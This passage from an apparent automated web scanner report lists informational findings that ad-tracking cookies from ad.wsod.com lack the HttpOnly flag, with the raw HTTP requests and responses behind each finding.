i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:16:05 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2; expires=Fri, 07-Oct-2011 15:15:54 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1144 function wsod_tag() { document.write('<style type="text/css">\n a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n a#wsoB:hover{color:black;text-decoration:underline;text-sh...[SNIP]...
13.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2; expires=Fri, 07-Oct-2011 15:21:04 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6673089?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:21:04 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2; expires=Fri, 07-Oct-2011 15:21:04 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 752 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" t...[SNIP]...
13.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2; expires=Fri, 07-Oct-2011 15:26:13 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6546395?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:26:13 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2; expires=Fri, 07-Oct-2011 15:26:13 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 747 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"...[SNIP]...
13.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2; expires=Fri, 07-Oct-2011 15:31:20 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7828836?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:31:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2; expires=Fri, 07-Oct-2011 15:31:20 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 751 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"...[SNIP]...
13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7171989?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:36:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 752 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"...[SNIP]...
13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2; expires=Fri, 07-Oct-2011 15:41:36 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/600712?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:41:36 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2; expires=Fri, 07-Oct-2011 15:41:36 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 752 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"...[SNIP]...
13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2; expires=Fri, 07-Oct-2011 15:46:45 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7161072?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:46:56 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2; expires=Fri, 07-Oct-2011 15:46:45 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1144 function wsod_tag() { document.write('<style type="text/css">\n a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n a#wsoB:hover{color:black;text-decoration:underline;text-sh...[SNIP]...
13.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2; expires=Fri, 07-Oct-2011 15:51:53 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/409603?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:51:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2; expires=Fri, 07-Oct-2011 15:51:53 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 753 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"...[SNIP]...
13.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2; expires=Fri, 07-Oct-2011 15:57:04 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/719556?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:57:15 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2; expires=Fri, 07-Oct-2011 15:57:04 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 766 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" ...[SNIP]...
13.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2; expires=Fri, 07-Oct-2011 16:02:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2609121?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 16:02:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2; expires=Fri, 07-Oct-2011 16:02:14 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 747 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"...[SNIP]...
13.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:46:221:0:50999:1315325243:B2|74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2; expires=Fri, 07-Oct-2011 16:07:23 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2886387?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 16:07:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:46:221:0:50999:1315325243:B2|74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2; expires=Fri, 07-Oct-2011 16:07:23 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 752 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" t...[SNIP]...
13.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|8:61:46:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|8:61:46:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
